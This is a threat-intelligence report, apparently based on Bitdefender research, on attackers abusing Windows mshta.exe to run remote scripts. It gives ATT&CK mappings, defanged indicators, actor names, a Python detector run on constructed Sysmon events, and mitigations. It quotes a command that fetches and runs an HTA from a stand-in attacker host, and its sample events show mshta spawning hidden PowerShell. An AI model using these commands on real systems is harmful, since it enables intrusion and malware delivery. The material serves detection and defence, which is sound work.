Bitdefender security researchers have discovered that attackers continue to exploit Microsoft HTML Application Host (MSHTA), a legacy utility available by default on Windows systems that can execute VBScript and JavaScript from local or remote files.
Analysis Summary
# Tool/Technique: MSHTA (Living-off-the-Land Binary)
## Overview
MSHTA (`mshta.exe`) is a legitimate legacy Windows utility designed to execute HTML Applications (HTA). It uses the Internet Explorer rendering engine to execute VBScript or JavaScript code from local or remote files. Attackers abuse this tool as a Living-off-the-Land Binary (LOLBIN) to bypass security controls and execute malicious scripts within a trusted, Microsoft-signed process.
## Technical Details
- **Type**: Technique (LOLBIN / Execution Vector)
- **Platform**: Windows
- **Capabilities**: Script execution (VBScript/JavaScript), remote file retrieval, multi-stage delivery, bypassing application whitelisting.
- **First Seen**: Legacy utility; active exploitation is ongoing with a recent surge in 2024-2025.
## MITRE ATT&CK Mapping
- **TA0002 - Execution**
- **T1218 - System Binary Proxy Execution**
- **T1218.005 - MSHTA**
- **TA0005 - Defense Evasion**
- **T1140 - Deobfuscate/Decode Files or Information**
- **TA0001 - Initial Access**
- **T1566.002 - Phishing: Spearphishing Link**
## Functionality
### Core Capabilities
- **Script Hosting**: Executes embedded VBScript and JavaScript outside the browser's sandbox.
- **Remote Fetching**: Capable of fetching and executing HTA files directly from a URL (e.g., `mshta.exe http://attacker[.]com/payload.hta`).
- **COM Access**: Can interact with COM objects to invoke other system tools like PowerShell or WMI.
### Advanced Features
- **Fileless Execution**: Used in multi-stage chains where the payload is never written to disk, residing only in memory or passed via command-line arguments.
- **Polymorphic Loaders**: Associated with the "CountLoader" framework, which uses rotating domain patterns and encrypted HTA files to evade signature-based detection.
## Indicators of Compromise
### File Hashes (Screener/Payloads)
- **SHA256**: `198CA5F4DF168BBFC06C61AB618F2E86BF69471BBA6C283AABEA190499BA` (del.ps1)
- **SHA256**: Various hashes associated with HTA loaders (CountLoader).
### File Names
- `checking.hta`
- `d6.hta`
- `r7.hta`
- `del.ps1`
### Network Indicators
- **C2/Hosting Domains**:
- `asq[.]d6shiiwz[.]pw`
- `asd[.]s7610rir[.]pw`
- `d1[.]pool4883[.]pw`
- `us1[.]somepools555[.]pw`
- **IP Addresses**:
- `185[.]208[.]159[.]199`
- `87[.]96[.]21[.]84`
- `58[.]221[.]252[.]210` (PurpleFox MSI delivery)
### Behavioral Indicators
- `mshta.exe` spawning `powershell.exe` or `cmd.exe`.
- `mshta.exe` communicating with external IP addresses or non-standard ports.
- Execution of `mshta.exe` with a URL in the command-line arguments.
## Associated Threat Actors
- **PurpleFox**: Uses MSHTA for initial stages of MSI delivery.
- **LummaStealer/Amatera Operators**: Utilize "ClickFix" social engineering lures to trigger MSHTA.
- **CountLoader Operators**: Heavy users of HTA-based delivery chains.
- **ClipBanker**: Leverages MSHTA for persistent compromise.
## Detection Methods
- **Behavioral Detection**: Monitor for `mshta.exe` making network connections or spawning shells. Use EDR to flag parent-child relationships where `mshta.exe` is the parent of script engines.
- **Command Line Monitoring**: Log and alert on `mshta.exe` command lines containing "http", "javascript:", or "vbscript:".
- **Signature-based**: Detect HTA files containing heavily obfuscated scripts or known delivery patterns (e.g., CountLoader domain structures).
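As an added example (not code from the Bitdefender report or any vendor), the following Python applies the behavioral indicators and detection methods listed above to a handful of constructed Sysmon-style events. The field names follow Sysmon Event ID 1 (process creation) and Event ID 3 (network connection); the hostnames, paths and record ids are placeholders, and the one external destination IP is taken from the report's indicator list. It flags `mshta.exe` launched with a URL or an inline `javascript:`/`vbscript:` handler, `mshta.exe` as the parent of a shell or script engine, and `mshta.exe` connecting to an external address or a non-standard port.

```python
"""Flag suspicious mshta.exe activity in Sysmon-style process and network events.

Constructed example: the events below imitate the fields of Sysmon Event ID 1
(process creation) and Event ID 3 (network connection) but are made up for this
demonstration; the hostnames, paths and record ids are placeholders.
"""
import ipaddress
import re
from dataclasses import dataclass

# Shells and script engines that mshta.exe should not be spawning on most hosts.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
}

# Command-line fragments from the detection section: remote fetch or inline script.
CMDLINE_PATTERNS = [
    ("a remote URL in its arguments", re.compile(r"http", re.I)),
    ("an inline javascript: handler", re.compile(r"javascript:", re.I)),
    ("an inline vbscript: handler", re.compile(r"vbscript:", re.I)),
]

# Ports an HTA fetched over plain HTTP(S) would normally use; anything else is unusual.
STANDARD_WEB_PORTS = {80, 443}


@dataclass
class Finding:
    record_id: int
    reasons: list


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path (handles both separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_process_event(ev: dict) -> list:
    """Return reasons an Event ID 1 record is suspicious (empty list if benign)."""
    reasons = []
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmdline = ev.get("CommandLine", "")
    if image == "mshta.exe":
        for label, pattern in CMDLINE_PATTERNS:
            if pattern.search(cmdline):
                reasons.append(f"mshta.exe launched with {label}")
    if parent == "mshta.exe" and image in SUSPICIOUS_CHILDREN:
        reasons.append(f"mshta.exe spawned {image}")
    return reasons


def analyze_network_event(ev: dict) -> list:
    """Return reasons an Event ID 3 record is suspicious (empty list if benign)."""
    if basename(ev.get("Image", "")) != "mshta.exe":
        return []
    reasons = []
    try:
        ip = ipaddress.ip_address(ev.get("DestinationIp", ""))
    except ValueError:
        return ["mshta.exe network event with an unparseable destination"]
    # is_global is False for RFC 1918, loopback, link-local and documentation ranges.
    if ip.is_global:
        reasons.append(f"mshta.exe connected to external address {ip}")
    port = int(ev.get("DestinationPort", 0))
    if port not in STANDARD_WEB_PORTS:
        reasons.append(f"mshta.exe connected on non-standard port {port}")
    return reasons


def scan(events: list) -> list:
    """Run both analyzers over a list of events and collect the findings."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 1:
            reasons = analyze_process_event(ev)
        elif ev.get("EventID") == 3:
            reasons = analyze_network_event(ev)
        else:
            reasons = []
        if reasons:
            findings.append(Finding(ev.get("RecordId"), reasons))
    return findings


# Constructed sample events (placeholders; 185.208.159.199 is from the report's IoC list).
SAMPLE_EVENTS = [
    {"EventID": 1, "RecordId": 101, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/checking.hta"},
    {"EventID": 1, "RecordId": 102, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden"},
    {"EventID": 1, "RecordId": 103, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\SysWOW64\mshta.exe",
     "CommandLine": 'mshta.exe "vbscript:CONSTRUCTED_PLACEHOLDER"'},
    {"EventID": 1, "RecordId": 104, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\helpdesk.hta"'},  # benign local HTA
    {"EventID": 3, "RecordId": 105, "Image": r"C:\Windows\System32\mshta.exe",
     "DestinationIp": "185.208.159.199", "DestinationPort": 8080},
    {"EventID": 3, "RecordId": 106, "Image": r"C:\Windows\System32\mshta.exe",
     "DestinationIp": "10.0.0.25", "DestinationPort": 443},  # internal, standard port
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding.record_id, "; ".join(finding.reasons))
```

Records 101, 102, 103 and 105 are flagged; the locally hosted HTA (104) and the internal HTTPS connection (106) are not. In production the "http" and port checks will need tuning against any sanctioned HTA deployment, which is also the point at which the AppLocker/WDAC block in the mitigation section becomes the simpler control.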
## Mitigation Strategies
- **Attack Surface Reduction (ASR)**: Implement rules to "Block Office applications from creating child processes."
- **Application Control**: Use Windows Defender Application Control (WDAC) or AppLocker to block `mshta.exe` if not required for business operations.
- **Feature Management**: As Microsoft deprecates VBScript, ensure the "VBScript Feature on Demand" is disabled where possible.
- **User Training**: Educate users on "ClickFix" lures, such as fake "browser update" or "fix error" prompts.
## Related Tools/Techniques
- **LUMMA / LummaStealer**: Commodity stealer often delivered via MSHTA.
- **CastleLoader**: Loader specializing in fileless delivery via HTA.
- **ClickFix**: Social engineering technique used to trick users into executing MSHTA commands.